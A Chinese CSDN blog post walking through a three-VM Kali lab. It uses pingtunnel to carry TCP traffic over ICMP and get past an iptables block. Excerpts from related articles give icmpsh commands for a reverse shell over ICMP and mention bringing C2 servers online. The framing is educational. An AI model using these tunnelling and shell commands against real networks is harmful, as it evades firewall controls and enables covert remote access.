ICMP隧道技术实现防火墙穿透

最新推荐文章于 2024-01-02 19:01:38 发布
最新推荐文章于 2024-01-02 19:01:38 发布
阅读量652 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 网络 运维 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43225966/article/details/130135263
版权

1.在mac os的虚拟机里准备三台kali
请添加图片描述
三台主机ip地址分别是 192.168.1.15,192.168.1.16,192.168.1.17,
为方便描述 依次把他们暂且命名为主机A,主机B,主机C
2.在主机C 上打开终端,输入 cd /usr/local/src
然后新建一个hello.txt 文件,文件里的内容写一句话:helloworld
在/usr/local/src 目录下输入命令 python3 -m http.server 开启http服务
在这里插入图片描述
3.在主机 A和B 上的浏览器分别输入192.168.1.17:8000,都能够访问
请添加图片描述
4.在主机C 上的终端输入sudo iptables -A INPUT -p tcp -s 192.168.1.15 -j DROP 设置防火墙规则,禁止主机A访问主机C上的所有tcp服务,因为http是建立在tcp之上的,所以A不能访问C主机的http服务
请添加图片描述

5.在浏览器输入https://github.com/esrrhs/pingtunnel/releases,下载pingtunnel,解压压缩包后传入A,B主机
在这里插入图片描述
6.把主机B作为pingtunnel服务端,A主机作为pingtunnel客户端

在 B主机终端上输入: sudo ./pingtunnel -type server -key 1234 #设置密码
在A主机终端上输入:
sudo ./pingtunnel -type client -l :4455 -s 192.168.1.16 -t 192.168.1.17:8000 -tcp 1 -key 1234 #监听本地的 4455 端口,发送到本机4455端口的流量将通过 ICMP 隧道转发到 C 服务器的 8000 端口
7.最终结果是: 主机A访问 本地的4455端口就可以实现对C主机上8000端口的访问,突破了防火墙的限制
在这里插入图片描述
8.参考链接

研究猿小刘
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络隧道技术ICMP隧道(pingTunnel/IcmpTunnel)
谢公子的博客
03-05 6087
目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道(Icmptunnel) ICMP隧道 ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相...
icmp报文_ICMP隧道
weixin_39980596的博客
11-22 178
2018年小黑考上了某三本大学的计算机专业,在骄阳似火的9月为了喝阔乐,和办宽带上网,小黑选择了前者。校园宿舍用的是CMCC网络,需要进行认证才能上百度。为了一边喝阔乐一边上网,小黑开始了折腾的不归路。下面简单的分析一哈ICMP隧道是如何建立和使用的。[1]这都是2015年的技术了~第一步:服务端启动隧道第二步:查看服务端的隧道IP、路由等信息服务端IP地址多了一个10.0.1.1,这就是咱们的隧...
icmp隧道
热门推荐
03-16 1万+
ICMP 隧道 原理 icmp报文中除了必须要有的类型、校验和等等还可以携带一定长度的可选数据,这也就是我们可以用来搭建隧道的原因,不过每次报文携带得的字节不会很多,所以有点慢。 icmpsh icmpsh是一款使用简单,而且不需要管理员权限即可运行的程序,可以较为简答的搭建隧道并同时获得目标shell 攻击机是kali, IP地址:192.168.220.129 下载icmpsh 到本地 git clone https://github.com/inquisb/icmpsh.git #下载工具 apt-
ICMP隧道
javaEE_zero的博客
11-23 236
ICMP隧道的实现原理和防御方式
icmp.rar_dns,icmp穿透_icmp_穿透_穿透防火墙_防火墙
09-19
利用icmp穿透防火墙网络编程的人来说是不可多得的代码哦
ICMP.rar_ICMP通信实现_icmp
09-20
在压缩包内的文件"www.pudn.com.txt"可能包含的是相关文档或说明,可能提供了关于如何使用和理解ICMP实现的详细信息。而"ICMP.C"则很可能是源代码文件,用C语言编写,实现ICMP协议的功能。开发者或学习者可以通过...
ICMP穿透防火墙示例
01-27
ICMP穿透防火墙示例
ICMP.rar_ICMP实现过程_icmp
09-22
了解ICMP实现过程对于网络管理员和网络开发人员来说至关重要,因为它可以帮助识别和解决网络通信中的问题。 ICMP报文结构主要包括以下几部分: 1. **类型字段**:8位,定义了ICMP报文的种类,如回显请求(ping)...
DNS与ICMP隧道资料
11-01
以前自己收集的一些DNS和ICMP隧道技术的文档, 非常有用, 包括源代码及文档资料, 欢迎下载
内网渗透系列:内网隧道之ICMP隧道
闵行小鱼塘
07-06 3002
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习ICMP隧道
ICMP隧道搭建
dzqxwzoe的博客
08-09 111
通过本次对icmp隧道穿透的讲解,我们掌握了如何在目标服务器不出网的情况下上线c2服务端的方法,后续我们将继续学习通过dns来搭建隧道的方法。通过本次对icmp隧道穿透的讲解,我们掌握了如何在目标服务器不出网的情况下上线c2服务端的方法,后续我们将继续学习通过dns来搭建隧道的方法。
网络安全技术之内网安全-03-ICMP隧道
caigai5424的博客
07-10 761
icmp隧道技术,绕过防火墙限制
icmp隧道--icmpsh
ddr12231的博客
09-24 289
本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 sysctl -w net.ipv4.icmp_echo_ighore_all=1 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 icmpsh.exe -t UbantuIP 详细命令 -t...
icmpsh建立ICMP隧道
大方子
01-27 4786
Kali:192.168.61.145 Win7:192.168.61.128 Kali上先下载icmpsh git clone https://github.com/inquisb/icmpsh.git 安装python-impacket apt-get install python-impacket 关闭Kali系统自己的ping回复(实验完成后,记得设回0) 然后进入icmpsh文件夹内执行 # python icmpsh_m.py [攻击机IP][目标IP] python icmpsh_m
ICMP隧道分析与实现
墨痕诉清风的博客
05-20 748
ICMP数据包封装过程 ICMP头部分为三个字段 type 类型 (0回应,8请求) code 代码 checksum 校验和 所以在封装ICMP报文的时候也要按顺序去封装这几个字段 其余部分三个部分为为 标识符 ( identifier ),一般填写进程 PID 以区分其他 ping 进程; 报文序号 ( sequence number ),用于编号报文序列; 数据 ( data ),可以是任意数据; ICMP协议在实际传输中数据包:
icmp隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 8012
icmp隧道的利用
ICMP隐蔽隧道工具Pingtunnel搭建隧道(附搭建环境避坑超详细)
最新发布
huayimy的博客
01-02 1664
服务端(中间跳板机):192.168.19.21(lan区段) & 192.168.203.144(nat模式)提前检查被控机win7的远程连接是否为开启状态,确认开启后,使用windows自带的远程桌面进行连接。在安装PingTunnel前,我们必须先要安装它的运行环境,否则安装失败。一台服务端(linux服务端,用于内网中转,lan区段+nat模式)一台客户端(kali攻击机,lan区段)一台远控机器(win7,lan区段)-da:指定要转发的目标机器的IP。一台靶机(win7,nat模式)
ICMP隐蔽隧道实现--icmpsh
2202_75358230的博客
11-21 61
内部网络中的大多数系统位于防火墙和公司代理之后,以控制入站和出站流量。因此,可以将此协议用作隐蔽隧道,以便获得shell并在目标主机上远程执行命令。这样的话就直接pip2这个flask包 ,看准需要下载什么版本,直接install就行了。但是我们查端口的话是什么也查不到的,只能通过抓icmp包去发现数据传输。运行此工具时需要运行以下命令,禁用所有ICMP回显答复。第一个ip地址是自己的ip,第二个ip地址是目标主机。可以看出,明文传输,我们执行的命令被抓到了。之后解压缩此文件,并cd进去。
内网渗透--ICMP隧道
05-16
对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值